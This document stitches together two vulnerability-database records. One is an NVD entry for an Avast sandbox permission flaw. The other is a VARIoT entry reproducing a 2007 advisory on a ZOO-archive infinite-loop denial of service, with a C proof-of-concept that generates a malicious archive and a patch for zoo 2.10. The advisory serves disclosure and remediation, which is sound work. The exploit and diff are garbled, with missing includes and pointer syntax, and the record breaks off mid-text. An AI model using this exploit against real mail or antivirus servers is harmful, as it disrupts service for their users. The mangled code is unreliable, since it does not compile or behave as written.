{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:avast:antivirus:*:*:*:*:*:*:*:*", "matchCriteriaId": "9530DCD6-2AE4-4E7E-A67A-5E5F87CE3DF3", "versionEndExcluding": "20.4", "vulnerable": true } ], "negate": false, "operator": "OR" } ] } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "Sandbox component in Avast Antivirus prior to 20.4 has an insecure permission which could be abused by local user to control the outcome of scans, and therefore evade detection or delete arbitrary system files." }, { "lang": "es", "value": "El componente Sandbox en Avast Antivirus versiones anteriores a 20.4, presenta un permiso no seguro que podr\u00eda ser abusado por el usuario local para controlar el resultado de los escaneos, y por lo tanto omitir la detecci\u00f3n o borrar archivos arbitrarios del sistema" } ], "id": "CVE-2021-45335", "lastModified": "2024-11-21T06:32:06.200", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.0, "impactScore": 6.0, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2021-12-27T14:15:07.580", "references": [ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST3%20%26%20CVE-2021-AVST4%20%26%20CVE-2021-AVST5" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://www.avast.com/hacker-hall-of-fame/en/researcher-david-eade-reports-antitrack-bug-to-avast-0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST3%20%26%20CVE-2021-AVST4%20%26%20CVE-2021-AVST5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.avast.com/hacker-hall-of-fame/en/researcher-david-eade-reports-antitrack-bug-to-avast-0" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-276" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
var-200705-0187
Vulnerability from variot
unzoo.c, as used in multiple products including AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file. The Zoo compression algorithm is prone to a remote denial-of-service vulnerability. This issue arises when applications implementing the Zoo algorithm process certain malformed archives. A successful attack can exhaust system resources and trigger a denial-of-service condition. This issue affects Zoo 2.10 and other applications implementing the vulnerable algorithm. Topic: Multiple vendors ZOO file decompression infinite loop DoS
Announced: 2007-05-04 Credits: Jean-Sebastien Guay-Leroux Products: Multiple (see section III) Impact: DoS (99% CPU utilisation) CVE ID: CVE-2007-1669, CVE-2007-1670, CVE-2007-1671, CVE-2007-1672, CVE-2007-1673
I. BACKGROUND
Zoo is a compression program and format developed by Rahul Dhesi in the mid 1980s. The format is based on the LZW compression algorithm and compressed files are identified by the .zoo file extension.
II. The vulnerability lies in the algorithm used to locate the files inside the archive. Each file in a ZOO archive is identified by a direntry structure. Those structures are linked between themselves with a 'next' pointer. This pointer is in fact an offset from the beginning of the file, representing the next direntry structure. By specifying an already processed file, it's possible to process more than one time this same file. The ZOO parser will then enter an infinite loop condition.
III. AFFECTED SOFTWARES
o Barracuda Spam Firewall o Panda Software Antivirus o avast! antivirus o Avira AntiVir o zoo-2.10 o unzoo.c o WinAce o PicoZip
IV. IMPACT
If this attack is conducted against a vulnerable antivirus, the host system will have its CPU at 100% utilization and may have problems answering other requests.
If this attack is conducted against an SMTP content filter running a vulnerable ZOO implementation, legitimate clients may be unable to send and receive email through this server.
V. SOLUTION
o Barracuda Spam Firewall - CVE-2007-1669: They fixed this problem in virusdef 2.0.6399 for firmware >= 3.4 and 2.0.6399o for firmware < 3.4 March 19th 2007.
o Panda Software Antivirus - CVE-2007-1670: They fixed this problem April 2nd 2007.
o avast! antivirus - CVE-2007-1672: They fixed this problem in version 4.7.981, April 14th 2007.
o Avira AntiVir - CVE-2007-1671: They fixed this problem in avpack32.dll version 7.3.0.6 March 22th 2007.
o zoo-2.10 - CVE-2007-1669: This software is not maintained anymore. A patch for version 2.10 is provided in section VII of this advisory because some SMTP content filters may still use this software.
o unzoo.c - CVE-2007-1673: This software is not maintained anymore. No patch is provided for this software.
o WinAce was contacted but no response was received from them.
o PicoZip was contacted but no response was received from them.
VI. PROOF OF CONCEPT
Using the PIRANA framework version 0.3.3, available at http://www.guay-leroux.com , it is possible to test your SMTP server against this vulnerability.
Alternatively, here is an exploit that will create a file that will trigger the infinite loop condition when it is processed.
/*
Exploit for the vulnerability: Multiple vendors ZOO file decompression infinite loop DoS
coded by Jean-S\xe9bastien Guay-Leroux September 2006
*/
include
include
include
// Structure of a ZOO header
define ZOO_HEADER_SIZE 0x0000002a
define ZH_TEXT 0
define ZH_TAG 20
define ZH_START_OFFSET 24
define ZH_NEG_START_OFFSET 28
define ZH_MAJ_VER 32
define ZH_MIN_VER 33
define ZH_ARC_HTYPE 34
define ZH_ARC_COMMENT 35
define ZH_ARC_COMMENT_LENGTH 39
define ZH_VERSION_DATA 41
define D_DIRENTRY_LENGTH 56
define D_TAG 0
define D_TYPE 4
define D_PACKING_METHOD 5
define D_NEXT_ENTRY 6
define D_OFFSET 10
define D_DATE 14
define D_TIME 16
define D_FILE_CRC 18
define D_ORIGINAL_SIZE 20
define D_SIZE_NOW 24
define D_MAJ_VER 28
define D_MIN_VER 29
define D_DELETED 30
define D_FILE_STRUCT 31
define D_COMMENT_OFFSET 32
define D_COMMENT_SIZE 36
define D_FILENAME 38
define D_VAR_DIR_LEN 51
define D_TIMEZONE 53
define D_DIR_CRC 54
define D_NAMLEN ( D_DIRENTRY_LENGTH + 0 )
define D_DIRLEN ( D_DIRENTRY_LENGTH + 1 )
define D_LFILENAME ( D_DIRENTRY_LENGTH + 2 )
void put_byte (char ptr, unsigned char data) { ptr = data; }
void put_word (char *ptr, unsigned short data) { put_byte (ptr, data); put_byte (ptr + 1, data >> 8); }
void put_longword (char *ptr, unsigned long data) { put_byte (ptr, data); put_byte (ptr + 1, data >> 8); put_byte (ptr + 2, data >> 16); put_byte (ptr + 3, data >> 24); }
FILE * open_file (char *filename) {
FILE *fp;
fp = fopen ( filename , "w" );
if (!fp) {
perror ("Cant open file");
exit (1);
}
return fp;
}
void usage (char *progname) {
printf ("\nTo use:\n");
printf ("%s <archive name>\n\n", progname);
exit (1);
}
int main (int argc, char argv[]) { FILE fp; char hdr = (char ) malloc (4096); char filename = (char ) malloc (256); int written_bytes; int total_size;
if ( argc != 2) {
usage ( argv[0] );
}
strncpy (filename, argv[1], 255);
if (!hdr || !filename) {
perror ("Error allocating memory");
exit (1);
}
memset (hdr, 0x00, 4096);
// Build a ZOO header
memcpy (hdr + ZH_TEXT, "ZOO 2.10 Archive.\032", 18);
put_longword (hdr + ZH_TAG, 0xfdc4a7dc);
put_longword (hdr + ZH_START_OFFSET, ZOO_HEADER_SIZE);
put_longword (hdr + ZH_NEG_START_OFFSET,
(ZOO_HEADER_SIZE) * -1);
put_byte (hdr + ZH_MAJ_VER, 2);
put_byte (hdr + ZH_MIN_VER, 0);
put_byte (hdr + ZH_ARC_HTYPE, 1);
put_longword (hdr + ZH_ARC_COMMENT, 0);
put_word (hdr + ZH_ARC_COMMENT_LENGTH, 0);
put_byte (hdr + ZH_VERSION_DATA, 3);
// Build vulnerable direntry struct
put_longword (hdr + ZOO_HEADER_SIZE + D_TAG, 0xfdc4a7dc);
put_byte (hdr + ZOO_HEADER_SIZE + D_TYPE, 1);
put_byte (hdr + ZOO_HEADER_SIZE + D_PACKING_METHOD, 0);
put_longword (hdr + ZOO_HEADER_SIZE + D_NEXT_ENTRY, 0x2a);
put_longword (hdr + ZOO_HEADER_SIZE + D_OFFSET, 0x71);
put_word (hdr + ZOO_HEADER_SIZE + D_DATE, 0x3394);
put_word (hdr + ZOO_HEADER_SIZE + D_TIME, 0x4650);
put_word (hdr + ZOO_HEADER_SIZE + D_FILE_CRC, 0);
put_longword (hdr + ZOO_HEADER_SIZE + D_ORIGINAL_SIZE, 0);
put_longword (hdr + ZOO_HEADER_SIZE + D_SIZE_NOW, 0);
put_byte (hdr + ZOO_HEADER_SIZE + D_MAJ_VER, 1);
put_byte (hdr + ZOO_HEADER_SIZE + D_MIN_VER, 0);
put_byte (hdr + ZOO_HEADER_SIZE + D_DELETED, 0);
put_byte (hdr + ZOO_HEADER_SIZE + D_FILE_STRUCT, 0);
put_longword (hdr + ZOO_HEADER_SIZE + D_COMMENT_OFFSET, 0);
put_word (hdr + ZOO_HEADER_SIZE + D_COMMENT_SIZE, 0);
memcpy (hdr + ZOO_HEADER_SIZE + D_FILENAME,
"AAAAAAAA.AAA", 13);
total_size = ZOO_HEADER_SIZE + 51;
fp = open_file (filename);
if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) {
printf ("The file has been written\n");
} else {
printf ("Cant write to the file\n");
exit (1);
}
fclose (fp);
return 0;
}
VII. PATCH
To fix this issue, ensure that the offset of the next file to process is always greater than the one you are currently processing. This will guarantee the fact that it's not possible to process the same files over and over again. Here is a patch for the software zoo version 2.10 distributed with many UNIX systems:
diff -u zoo/zooext.c zoo-patched/zooext.c --- zoo/zooext.c 1991-07-11 15:08:00.000000000 -0400 +++ zoo-patched/zooext.c 2007-03-16 16:45:28.000000000 -0500 @@ -89,6 +89,7 @@ #endif struct direntry direntry; / directory entry / int first_dir = 1; / first dir entry seen? / +unsigned long zoo_pointer = 0; / Track our position in the file /
static char extract_ver[] = "Zoo %d.%d is needed to extract %s.\n"; static char no_space[] = "Insufficient disk space to extract %s.\n"; @@ -169,6 +170,9 @@ exit_status = 1; } zooseek (zoo_file, zoo_header.zoo_start, 0); / seek to where data begins / + + / Begin tracking our position in the file / + zoo_pointer = zoo_header.zoo_start; }
#ifndef PORTABLE @@ -597,6 +601,12 @@ } / end if /
loop_again: + + / Make sure we are not seeking to already processed data / + if (next_ptr <= zoo_pointer) + prterror ('f', "ZOO chain structure is corrupted\n"); + zoo_pointer = next_ptr; + zooseek (zoo_file, next_ptr, 0); / ..seek to next dir entry / } / end while /
diff -u zoo/zoolist.c zoo-patched/zoolist.c --- zoo/zoolist.c 1991-07-11 15:08:04.000000000 -0400 +++ zoo-patched/zoolist.c 2007-03-16 16:45:20.000000000 -0500 @@ -92,6 +92,7 @@ int show_mode = 0; / show file protection / #endif int first_dir = 1; / if first direntry -- to adjust dat_ofs / +unsigned long zoo_pointer = 0; / Track our position in the file /
while (option) { switch (option) { @@ -211,6 +212,9 @@ show_acmt (&zoo_header, zoo_file, 0); / show archive comment / }
- / Begin tracking our position in the file /
- zoo_pointer = zoo_header.zoo_start; + / Seek to the beginning of the first directory entry / if (zooseek (zoo_file, zoo_header.zoo_start, 0) != 0) { ercount++; @@ -437,6 +441,11 @@ if (verb_list && !fast) show_comment (&direntry, zoo_file, 0, (char ) NULL); } / end if (lots of conditions) */ +
- / Make sure we are not seeking to already processed data /
- if (direntry.next <= zoo_pointer)
- prterror ('f', "ZOO chain structure is corrupted\n");
- zoo_pointer = direntry.next;
/* ..seek to next dir entry */ zooseek (zoo_file, direntry.next, 0);
VIII. CREDITS
Jean-Sebastien Guay-Leroux found the bug and wrote the exploit for it.
IX. REFERENCES
-
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1669
-
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1670
-
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1671
-
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1672
-
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1673
X. HISTORY
2006-09-?? : Vulnerability is found 2007-03-19 : All vendors notified 2007-03-19 : Barracuda Networks provided a fix 2007-03-22 : Avira provided a fix 2007-04-02 : Panda Antivirus provided a fix 2007-04-14 : avast! antivirus provided a fix 2007-05-04 : Public disclosure
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-200705-0187", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "amavis", "scope": "lte", "trust": 1.8, "vendor": "amavis", "version": "2.4.1" }, { "model": "antivir personal", "scope": "eq", "trust": 1.6, "vendor": "avira", "version": "7" }, { "model": "antivir", "scope": "eq", "trust": 1.3, "vendor": "avira", "version": "6.35.00.00" }, { "model": "antivirus professional", "scope": "eq", "trust": 1.0, "vendor": "avast", "version": "4.7.1098" }, { "model": "spam firewall", "scope": "eq", "trust": 1.0, "vendor": "barracuda", "version": "model_800" }, { "model": "antivirus home", "scope": "eq", "trust": 1.0, "vendor": "avast", "version": "4.7.869" }, { "model": "zoo", "scope": "lte", "trust": 1.0, "vendor": "rahul dhesi", "version": "2.10" }, { "model": "antivirus", "scope": "eq", "trust": 1.0, "vendor": "avast", "version": "4.7.652" }, { "model": "unzoo", "scope": "eq", "trust": 1.0, "vendor": "unzoo", "version": "4.4" }, { "model": "antivirus home", "scope": "eq", "trust": 1.0, "vendor": "avast", "version": "4.7.1043" }, { "model": "antivir", "scope": "eq", "trust": 1.0, "vendor": "avira", "version": "7.04.00.23" }, { "model": "antivirus home", "scope": "eq", "trust": 1.0, "vendor": "avast", "version": "4.7.1098" }, { "model": "spam firewall", "scope": "eq", "trust": 1.0, "vendor": "barracuda", "version": "model_500" }, { "model": "antivir", "scope": "eq", "trust": 1.0, "vendor": "avira", "version": "*" }, { "model": "antivirus", "scope": "lte", "trust": 1.0, "vendor": "avast", "version": "4.7.980" }, { "model": "antivirus and firewall", "scope": "eq", "trust": 1.0, "vendor": "panda", "version": "2007" }, { "model": "antivirus professional", "scope": "eq", "trust": 1.0, "vendor": "avast", "version": "4.6" }, { "model": "antivirus professional", "scope": "eq", "trust": 1.0, "vendor": "avast", "version": "4.6.665" }, { "model": "spam firewall", "scope": "eq", "trust": 1.0, "vendor": "barracuda", "version": "model_600" }, { "model": "antivir personal", "scope": "lte", "trust": 1.0, "vendor": "avira", "version": "7.3.0.5" }, { "model": "antivirus", "scope": "eq", "trust": 1.0, "vendor": "avast", "version": "4.7.700" }, { "model": "antivirus home", "scope": "eq", "trust": 1.0, "vendor": "avast", "version": "4.6.665" }, { "model": "antivirus home", "scope": "eq", "trust": 1.0, "vendor": "avast", "version": "4.6" }, { "model": "picozip", "scope": "eq", "trust": 1.0, "vendor": "picozip", "version": "*" }, { "model": "antivirus professional", "scope": "eq", "trust": 1.0, "vendor": "avast", "version": "4.6.691" }, { "model": "spam firewall", "scope": "eq", "trust": 1.0, "vendor": "barracuda", "version": "*" }, { "model": "antivirus professional", "scope": "eq", "trust": 1.0, "vendor": "avast", "version": "4.7.844" }, { "model": "antivirus", "scope": "eq", "trust": 1.0, "vendor": "avast", "version": "4.6.394" }, { "model": "antivirus professional", "scope": "eq", "trust": 1.0, "vendor": "avast", "version": "4.7.827" }, { "model": "antivirus professional", "scope": "eq", "trust": 1.0, "vendor": "avast", "version": "4.6.652" }, { "model": "spam firewall", "scope": "eq", "trust": 1.0, "vendor": "barracuda", "version": "model_900" }, { "model": "antivirus home", "scope": "eq", "trust": 1.0, "vendor": "avast", "version": "4.6.691" }, { "model": "antivirus home", "scope": "eq", "trust": 1.0, "vendor": "avast", "version": "4.7.844" }, { "model": "antivirus professional", "scope": "eq", "trust": 1.0, "vendor": "avast", "version": "4.0" }, { "model": "winace", "scope": "eq", "trust": 1.0, "vendor": "winace", "version": "*" }, { "model": "antivirus home", "scope": "eq", "trust": 1.0, "vendor": "avast", "version": "4.7.827" }, { "model": "antivirus professional", "scope": "eq", "trust": 1.0, "vendor": "avast", "version": "4.6.603" }, { "model": "antivirus", "scope": "eq", "trust": 1.0, "vendor": "panda", "version": "2007" }, { "model": "antivir personal", "scope": "eq", "trust": 1.0, "vendor": "avira", "version": "*" }, { "model": "spam firewall", "scope": "eq", "trust": 1.0, "vendor": "barracuda", "version": "model_100" }, { "model": "antivirus professional", "scope": "eq", "trust": 1.0, "vendor": "avast", "version": "4.7.869" }, { "model": "spam firewall", "scope": "eq", "trust": 1.0, "vendor": "barracuda", "version": "model_200" }, { "model": "spam firewall", "scope": "eq", "trust": 1.0, "vendor": "barracuda", "version": "model_400" }, { "model": "antivirus home", "scope": "eq", "trust": 1.0, "vendor": "avast", "version": "4.6.652" }, { "model": "spam firewall", "scope": "eq", "trust": 1.0, "vendor": "barracuda", "version": "model_300" }, { "model": "antivirus home", "scope": "eq", "trust": 1.0, "vendor": "avast", "version": "4.6.655" }, { "model": "antivirus home", "scope": "eq", "trust": 1.0, "vendor": "avast", "version": "4.0" }, { "model": "antivirus professional", "scope": "eq", "trust": 1.0, "vendor": "avast", "version": "4.7.1043" }, { "model": "activescan", "scope": "eq", "trust": 0.6, "vendor": "panda", "version": "5.53" }, { "model": "antivir personal", "scope": "eq", "trust": 0.6, "vendor": "avira", "version": "7.3.0.5" }, { "model": "zoo", "scope": "eq", "trust": 0.3, "vendor": "zoo", "version": "2.10" }, { "model": "winace", "scope": "eq", "trust": 0.3, "vendor": "winace", "version": "2.605" }, { "model": "winace", "scope": "eq", "trust": 0.3, "vendor": "winace", "version": "2.5" }, { "model": "winace", "scope": "eq", "trust": 0.3, "vendor": "winace", "version": "2.60" }, { "model": "unzoo", "scope": "eq", "trust": 0.3, "vendor": "unzoo", "version": "4.4-2" }, { "model": "picozip", "scope": "eq", "trust": 0.3, "vendor": "picozip", "version": "4.0.2" }, { "model": "picozip", "scope": "eq", "trust": 0.3, "vendor": "picozip", "version": "4.0.1" }, { "model": "titanium antivirus antispyware", "scope": "eq", "trust": 0.3, "vendor": "panda", "version": "2006+" }, { "model": "titanium antivirus", "scope": "eq", "trust": 0.3, "vendor": "panda", "version": "2005" }, { "model": "platinum internet security", "scope": "eq", "trust": 0.3, "vendor": "panda", "version": "20070" }, { "model": "platinum internet security", "scope": "eq", "trust": 0.3, "vendor": "panda", "version": "2006" }, { "model": "antivirus platinum", "scope": "eq", "trust": 0.3, "vendor": "panda", "version": "2.0" }, { "model": "antivirus for netware", "scope": "eq", "trust": 0.3, "vendor": "panda", "version": "2.0" }, { "model": "activescan", "scope": "eq", "trust": 0.3, "vendor": "panda", "version": "5.54.1" }, { "model": "activescan", "scope": "eq", "trust": 0.3, "vendor": "panda", "version": "5.0" }, { "model": "networks barracuda spam firewall", "scope": "eq", "trust": 0.3, "vendor": "barracuda", "version": "3.3.15026" }, { "model": "networks barracuda spam firewall", "scope": "eq", "trust": 0.3, "vendor": "barracuda", "version": "3.1.18" }, { "model": "networks barracuda spam firewall", "scope": "eq", "trust": 0.3, "vendor": "barracuda", "version": "3.1.17" }, { "model": "networks barracuda spam firewall", "scope": "eq", "trust": 0.3, "vendor": "barracuda", "version": "3.3.03.055" }, { "model": "networks barracuda spam firewall", "scope": "eq", "trust": 0.3, "vendor": "barracuda", "version": "3.3.03.053" }, { "model": "networks barracuda spam firewall", "scope": "eq", "trust": 0.3, "vendor": "barracuda", "version": "3.3.03.022" }, { "model": "networks barracuda spam firewall", "scope": "eq", "trust": 0.3, "vendor": "barracuda", "version": "3.3.01.001" }, { "model": "networks barracuda spam firewall", "scope": "eq", "trust": 0.3, "vendor": "barracuda", "version": "3.3.0.54" }, { "model": "desktop for windows", "scope": "eq", "trust": 0.3, "vendor": "avira", "version": "1.00.00.68" }, { "model": "antivir workstation professional build", "scope": "eq", "trust": 0.3, "vendor": "avira", "version": "367" }, { "model": "antivir personaledition premium build", "scope": "eq", "trust": 0.3, "vendor": "avira", "version": "228" }, { "model": "antivir personaledition classic build", "scope": "eq", "trust": 0.3, "vendor": "avira", "version": "180" }, { "model": "avast! linux home edition", "scope": "eq", "trust": 0.3, "vendor": "avast", "version": "1.0.5" }, { "model": "avast! linux home edition", "scope": "eq", "trust": 0.3, "vendor": "avast", "version": "1.0.5-1" }, { "model": "antivirus server edition", "scope": "eq", "trust": 0.3, "vendor": "avast", "version": "4.7.726" }, { "model": "antivirus server edition", "scope": "eq", "trust": 0.3, "vendor": "avast", "version": "4.7.676" }, { "model": "antivirus server edition", "scope": "eq", "trust": 0.3, "vendor": "avast", "version": "4.7.660" }, { "model": "antivirus server edition", "scope": "eq", "trust": 0.3, "vendor": "avast", "version": "4.6.566" }, { "model": "antivirus server edition", "scope": "eq", "trust": 0.3, "vendor": "avast", "version": "4.6.489" }, { "model": "antivirus server edition", "scope": "eq", "trust": 0.3, "vendor": "avast", "version": "4.6.460" }, { "model": "antivirus professional edition", "scope": "eq", "trust": 0.3, "vendor": "avast", "version": "4.7.844" }, { "model": "antivirus professional edition", "scope": "eq", "trust": 0.3, "vendor": "avast", "version": "4.7.827" }, { "model": "antivirus professional edition", "scope": "eq", "trust": 0.3, "vendor": "avast", "version": "4.6.691" }, { "model": "antivirus professional edition", "scope": "eq", "trust": 0.3, "vendor": "avast", "version": "4.6.665" }, { "model": "antivirus professional edition", "scope": "eq", "trust": 0.3, "vendor": "avast", "version": "4.6.652" }, { "model": "antivirus professional edition", "scope": "eq", "trust": 0.3, "vendor": "avast", "version": "4.6.603" }, { "model": "antivirus professional edition", "scope": "eq", "trust": 0.3, "vendor": "avast", "version": "4.6" }, { "model": "antivirus professional edition", "scope": "eq", "trust": 0.3, "vendor": "avast", "version": "4.0" }, { "model": "antivirus managed client", "scope": "eq", "trust": 0.3, "vendor": "avast", "version": "4.6.394" }, { "model": "antivirus managed client", "scope": null, "trust": 0.3, "vendor": "avast", "version": null }, { "model": "antivirus home edition", "scope": "eq", "trust": 0.3, "vendor": "avast", "version": "4.7.869" }, { "model": "antivirus home edition", "scope": "eq", "trust": 0.3, "vendor": "avast", "version": "4.7.844" }, { "model": "antivirus home edition", "scope": "eq", "trust": 0.3, "vendor": "avast", "version": "4.7.827" }, { "model": "antivirus home edition", "scope": "eq", "trust": 0.3, "vendor": "avast", "version": "4.6.691" }, { "model": "antivirus home edition", "scope": "eq", "trust": 0.3, "vendor": "avast", "version": "4.6.665" }, { "model": "antivirus home edition", "scope": "eq", "trust": 0.3, "vendor": "avast", "version": "4.6.655" }, { "model": "antivirus home edition", "scope": "eq", "trust": 0.3, "vendor": "avast", "version": "4.6.652" }, { "model": "antivirus home edition", "scope": "eq", "trust": 0.3, "vendor": "avast", "version": "4.6" }, { "model": "antivirus home edition", "scope": "eq", "trust": 0.3, "vendor": "avast", "version": "4.0" } ], "sources": [ { "db": "BID", "id": "23823" }, { "db": "JVNDB", "id": "JVNDB-2007-001745" }, { "db": "CNNVD", "id": "CNNVD-200705-118" }, { "db": "NVD", "id": "CVE-2007-1673" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:amavis:amavis", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2007-001745" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Jean-Sebastien Guay-Leroux is credited with discovering this issue.", "sources": [ { "db": "BID", "id": "23823" }, { "db": "CNNVD", "id": "CNNVD-200705-118" } ], "trust": 0.9 }, "cve": "CVE-2007-1673", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CVE-2007-1673", "impactScore": 6.9, "integrityImpact": "NONE", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "VHN-25035", "impactScore": 6.9, "integrityImpact": "NONE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2007-1673", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2007-1673", "trust": 0.8, "value": "High" }, { "author": "CNNVD", "id": "CNNVD-200705-118", "trust": 0.6, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-25035", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-25035" }, { "db": "JVNDB", "id": "JVNDB-2007-001745" }, { "db": "CNNVD", "id": "CNNVD-200705-118" }, { "db": "NVD", "id": "CVE-2007-1673" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "unzoo.c, as used in multiple products including AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file. The Zoo compression algorithm is prone to a remote denial-of-service vulnerability. This issue arises when applications implementing the Zoo algorithm process certain malformed archives. \nA successful attack can exhaust system resources and trigger a denial-of-service condition. \nThis issue affects Zoo 2.10 and other applications implementing the vulnerable algorithm. Topic: Multiple vendors ZOO file decompression infinite\n loop DoS\n\nAnnounced: 2007-05-04\nCredits: Jean-Sebastien Guay-Leroux\nProducts: Multiple (see section III)\nImpact: DoS (99% CPU utilisation)\nCVE ID: CVE-2007-1669, CVE-2007-1670, CVE-2007-1671,\n CVE-2007-1672, CVE-2007-1673\n\n\nI. BACKGROUND\n\nZoo is a compression program and format developed by Rahul Dhesi in the mid\n1980s. The format is based on the LZW compression algorithm and compressed\nfiles are identified by the .zoo file extension. \n\n\nII. The vulnerability lies in the algorithm used to locate the\nfiles inside the archive. Each file in a ZOO archive is identified by a\ndirentry structure. Those structures are linked between themselves with a\n\u0027next\u0027 pointer. This pointer is in fact an offset from the beginning of\nthe file, representing the next direntry structure. By specifying an\nalready processed file, it\u0027s possible to process more than one time this\nsame file. The ZOO parser will then enter an infinite loop condition. \n\n\nIII. AFFECTED SOFTWARES\n\no Barracuda Spam Firewall\no Panda Software Antivirus\no avast! antivirus\no Avira AntiVir\no zoo-2.10\no unzoo.c\no WinAce\no PicoZip\n\n\nIV. 